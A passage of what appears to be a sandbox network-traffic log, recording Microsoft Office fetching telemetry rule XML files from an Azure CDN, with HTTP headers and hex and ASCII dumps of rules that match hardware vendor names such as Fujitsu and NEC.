                                                                                                                                      2024-10-07 01:23:00 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      22192.168.2.44975713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:00 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:00 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 494
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                      x-ms-request-id: d3d0b776-b01e-003d-1803-17d32c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012300Z-1657d5bbd48lknvp09v995n79000000002fg000000005d62
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:00 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      23192.168.2.44975813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:01 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                      x-ms-request-id: 09392ef7-101e-0046-3f05-1791b0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012301Z-1657d5bbd482tlqpvyz9e93p5400000002yg00000000336n
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      24192.168.2.44976013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:01 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 404
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                      x-ms-request-id: f57b7c9f-801e-00a0-4a13-172196000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012301Z-1657d5bbd48lknvp09v995n79000000002a000000000tp4y
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:01 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      25192.168.2.44976213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:01 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 428
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                      x-ms-request-id: 6be05283-001e-00a2-2700-17d4d5000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012301Z-1657d5bbd48f7nlxc7n5fnfzh000000002c000000000ktpc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:01 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      26192.168.2.44976113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:01 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                      x-ms-request-id: d112c6a6-a01e-000d-2160-17d1ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012301Z-1657d5bbd48dfrdj7px744zp8s00000002g000000000h1u3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:01 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      27192.168.2.44975913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:01 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                      x-ms-request-id: 20b36261-201e-006e-7102-17bbe3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012301Z-1657d5bbd48dfrdj7px744zp8s00000002k000000000a4zy
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      28192.168.2.44976713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:02 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:02 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 494
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                      x-ms-request-id: 7c825ef0-601e-0001-5f02-17faeb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012302Z-1657d5bbd48vlsxxpe15ac3q7n00000002tg0000000076e9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:02 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      29192.168.2.44976513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:02 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:02 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                      x-ms-request-id: 7cec3a6f-e01e-0033-3414-174695000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012302Z-1657d5bbd48gqrfwecymhhbfm800000001h000000000p3g9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      30192.168.2.44976313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:02 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:02 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 499
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                      x-ms-request-id: 40323690-a01e-0002-0100-175074000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012302Z-1657d5bbd48p2j6x2quer0q02800000002y000000000gxhb
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:02 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      31192.168.2.44976413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:02 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:02 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                      x-ms-request-id: c530354f-501e-0016-5013-17181b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012302Z-1657d5bbd48qjg85buwfdynm5w00000002t000000000r2cu
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
